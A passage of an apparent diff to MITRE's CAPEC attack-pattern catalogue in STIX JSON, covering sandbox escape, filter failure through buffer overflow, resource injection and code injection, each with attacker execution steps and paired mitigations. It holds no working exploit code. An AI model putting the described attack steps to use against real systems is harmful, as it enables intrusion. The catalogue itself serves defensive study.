  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

  2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Sanitize the code of the standard libraries to make sure there is no security weaknesses in them.", + "id": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8d07f3e-4893-4581-9ddd-565364f55f22", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93d2ef31-a689-4f16-bf00-29334bcab36a", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.", + "id": 
"course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1bf353f-a708-448c-8b53-22dadacd7c49", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--223d8fc3-bfd2-4786-917f-9e09d40cd357", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.", + "id": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9627981c-870d-4aff-a472-cb655535e9f3", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c136203e-0b03-420c-828f-a1e4a8b0534b", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Get latest updates for the computer.", + "id": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-237-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22d46b75-55c1-431a-a27b-350b72fa6541", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6f9e9be-3354-4590-80a2-a451a7d8e128", + "spec_version": "2.1", + "target_ref": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not appear to be a valid attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-238", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/238.html" + } + ], + "id": "attack-pattern--481983de-2023-47f1-be60-642556a65376", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Using URL/codebase / G.A.C. 
(code source) to convince sandbox of privilege", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it did not contain any content and did not serve any useful purpose. Please refer to \"CAPEC-207: removing Important Client Functionality\" going forward.", + "external_references": [ + { + "external_id": "CAPEC-239", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/239.html" + } + ], + "id": "attack-pattern--f7c4e923-3a66-458b-8bfe-bbeeebefe86a", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Subversion of Authorization Checks: Cache Filtering, Programmatic Security, etc.", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. 
the user input is let into the system unfiltered).", + "external_references": [ + { + "external_id": "CAPEC-24", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/24.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Filter Failure through Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack.\n ", + "A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.", + "Audit Truncation and Filters with Buffer Overflow. 
Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

  2. Techniques
    Spidering web sites for inputs that involve potential filtering
    Brute force guessing of filtered inputs

Experiment

  1. Attempt injections: Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.

  2. Techniques
    Brute force attack through black box penetration test tool.
    Fuzzing of communications protocols
    Manual testing of possible inputs with attack data.
  3. Monitor responses: Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?

  4. Techniques
    Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.
    Check Log files. An attacker with access to log files can look at the outcome of bad input.

Exploit

  1. Abuse the system through filter failure: An attacker writes a script to consistently induce the filter failure.

  2. Techniques
    DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.
    Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.
    An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Ability to control the length of data passed to an active filter." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", + "id": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b078701a-fc7f-4782-8328-f24692e8b6f9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design: Use a language or 
compiler that performs automatic bounds checking.", + "id": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. 
Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operational: Use OS-level preventative functionality. 
Not a complete solution.", + "id": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5152f113-a2d4-4665-bec3-a45da5d7b399", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9bfea83-be0c-47f2-99c5-56b5812d013b", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use an abstraction library to abstract away risky APIs. 
Not a complete solution.", + "id": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--adcbc9cc-ab6a-4107-bbb0-3c1ad2233710", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8d851ab-8c11-49fb-8bb1-ae0f95175539", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.", + "external_references": [ + { + "external_id": "CAPEC-240", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/240.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "description": "Resource Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Resource_Injection" + } + ], + "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Resource Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": 
[ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4" + ], + "x_capec_prerequisites": [ + "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all input content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56610af9-7476-40eb-9fe6-53cf9958d96d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "spec_version": "2.1", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + 
"modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49b55648-8b51-4e4f-981c-60f90a683b32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce regular patching of software.", + "id": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6454cc9d-9fac-4495-9887-bfcf65fb0131", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "spec_version": "2.1", + "target_ref": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-242 : Code Injection\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-241", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/241.html" + } + ], + "id": "attack-pattern--b8923381-6219-46bf-b05d-3fa706c0d467", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Code Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.", + "external_references": [ + { + "external_id": "CAPEC-242", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/242.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "description": "Code Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Code_Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-612", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection.html" + } + ], + "id": 
"attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Code Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--634aeef0-13a8-449b-afea-332cbc6095bf", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "attack-pattern--581433c0-1d73-4975-80f1-6dcee4761bbc", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_prerequisites": [ + "The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-242-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f5e3b137-a200-4caa-9f02-88cba0ca4e80", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a99fa1c3-7798-453a-8c18-1387446a4827", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcbfee88-5388-4fea-b023-06917c8b7cfd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef62d977-a0fa-4d4d-a3c5-9830fba4f873", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e446d58c-04b2-49cb-a3bd-32a5c4a303b0", + "modified": "2020-12-17T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b074b90c-807f-4764-ae36-cfc636a4d377", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8d51fc9-bebb-4f00-9ce1-e0bcb3815d42", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. 
